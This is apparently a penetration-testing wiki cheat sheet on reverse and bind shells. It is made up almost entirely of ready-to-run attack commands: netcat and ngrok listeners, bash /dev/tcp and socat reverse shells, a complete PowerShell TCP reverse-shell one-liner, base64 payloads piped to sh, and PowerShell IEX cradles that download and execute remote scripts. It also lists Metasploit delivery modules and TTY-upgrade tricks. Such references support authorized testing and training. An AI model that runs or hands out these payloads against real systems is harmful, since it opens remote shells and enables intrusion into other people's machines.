Reverse & Bind Shells

Last updated 2 months ago

Was this helpful?

Reverse & Bind Shells

busybox nc

Listener

nc -nlvp <PORT>

Public to the world

ngrok tcp <PORT>

Main

/bin/bash -c 'bash -i>&/dev/tcp/<myIP>/<myPORT> 0>&1';

echo "<PayloadBASE64>" | base64 -d | sh

socat TCP4:<myIP>:<myPORT> EXEC:/bin/bash

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('<IP>',<PORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

powershell -enc <PayloadBASE64>

powershell IEX(New-Object Net.Webclient).downloadString('http://<MY_IP>:<MY_PORT>/Invoke-PowerShellTcp.ps1')

exploit/multi/script/web_delivery

exploit/windows/smb/smb_delivery

TTY

Description

Command

Bash

/bin/bash -i

Python

python3 -c 'import pty; pty.spawn("/bin/bash")'

Perl

perl —e 'exec "/bin/sh";' perl: exec "/bin/sh";

Ruby

ruby: exec "/bin/sh"

Lua

lua: os.execute('/bin/sh')

AWK

awk 'BEGIN {system("/bin/sh")}'

Socat

On Attacker socat file:`tty`,raw,echo=0 tcp-listen:<PORT2> On RevShell socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<Attacker_IP>:<PORT2>

Shell handler with auto-upgrade shells to PTY

Windows TTY stty raw -echo; (stty size; cat) | nc -lvnp <PORT> IEX(IWR http://<IP_SERVER>:<PORT_SERVER>/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell <MY_IP> <MY_PORT>

<CTRL+Z>
stty raw -echo 
fg

Command & Control (C2)

Last updated 2 months ago

Was this helpful?